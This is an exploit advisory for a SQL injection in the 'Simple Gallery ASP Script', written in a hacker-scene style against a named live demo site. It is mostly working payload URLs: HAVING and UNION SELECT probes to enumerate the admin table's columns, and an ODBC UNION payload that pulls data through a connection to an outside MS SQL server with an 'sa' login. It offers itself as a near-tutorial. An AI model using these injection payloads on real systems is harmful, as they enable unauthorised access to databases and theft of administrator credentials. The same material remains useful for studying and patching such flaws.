#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################


#######By:  e.wiZz!     ew1zz@hotmail.com
#####Info: Bosnian Idiot FTW!
#####Site:  infected.blogger.ba
#####Greetz: Luigi Auriemma,str0ke 

In the wild....
######################################################################################

#####Project Name: Simple Gallery ASP Script
#####Site: preprojects.com
#####Vulnerability: SQL Injection

#####PoC on demo site :
http://www.preprojects.com/pgallery/gallery/

Ok,we have table "admin",but we need to find how many columns is there,to extract somethin' ....but we need to know at least one column to start....lets find one :)

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'

we got photo_id ....lets find how many columns is there:

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin

we got error: The number of columns in the two selected tables or queries of a union query do not match. Try something else...
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin

response: No value given for one or more required parameters. ......so its 9 columns...i wont continue with it.



Connect to a network accessible MS SQL instance (heavy injection :) 

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT *
FROM [ODBC;DRIVER=SQL SERVER;Server=<serverinthewild>,<Port>;UID=sa;PWD=<PASSWORD>;
DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'


Almost tutorial :)